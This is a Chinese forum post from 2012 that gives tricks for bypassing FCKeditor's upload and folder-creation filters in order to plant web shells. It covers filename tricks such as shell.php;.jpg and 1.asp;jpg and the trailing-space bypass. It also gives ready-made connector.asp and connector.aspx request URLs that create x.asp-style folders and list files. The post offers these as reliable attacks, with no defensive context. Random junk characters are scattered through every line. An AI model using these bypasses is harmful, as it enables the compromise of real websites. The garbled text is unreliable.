很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg7 [6 o( P. [9 ]/ q4 @5 ^, ^' \5 q) i
0 \% e6 H2 B4 v提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
4 D* E8 ]. g! k7 p4 k# d9 u- n p
$ W4 `9 V. z, r5 z$ w4 g继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。7 _- w4 s4 F; J, ^ l
; a; B' y% R# ^. e2 |
突破建立文件夹:9 V$ r( j8 B0 q e) n; D6 P
; w4 f1 e( c1 j2 g: N- v! m9 u# Veditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp6 i2 P+ |: N1 z6 t7 K
* U$ C- n" W* T参数:
. I3 l2 l; f# ]: G% R* f, l8 Z1 ^: b7 F7 I( ?( O
当前目录名:CurrentFolder=/qing.asp
% X: u$ p6 F; i* Y% `7 U/ I; l- `. N+ C K7 I2 e$ [; c
新的目录名:NewFolderName=x.asp
1 D2 Z! j/ E" X/ @7 i4 v+ h! j: p0 D% [. h' M
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……8 R$ t4 L6 L8 y/ K0 S) r+ }' Z
4 ?9 h/ c' v- w# ]那么 x.asp 就已经建立生成了,此方法百试百灵!5 Z5 h% c+ [+ Q6 n& W% x
1 J) L, j# m+ l& x+ N$ O) |新建文件夹参数 x.asp,基本都能搞定。5 U! W/ a! i& c! E4 X
1 p( C h. i6 a下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
2 D- U# I1 Z; k9 J C# m6 Z7 T0 n+ `
( }9 u% a1 i3 baspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp# C/ A- C! ~1 J8 V8 t
+ w, G2 l$ M5 v
获取文件列表9 F* Y9 |% F: f: x3 ~
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F1 }9 T5 T( N5 r; o1 r+ n
( ]2 M* E- @, y/ x$ I
|
发表于 2012-12-31 09:27:09
收藏
支持
反对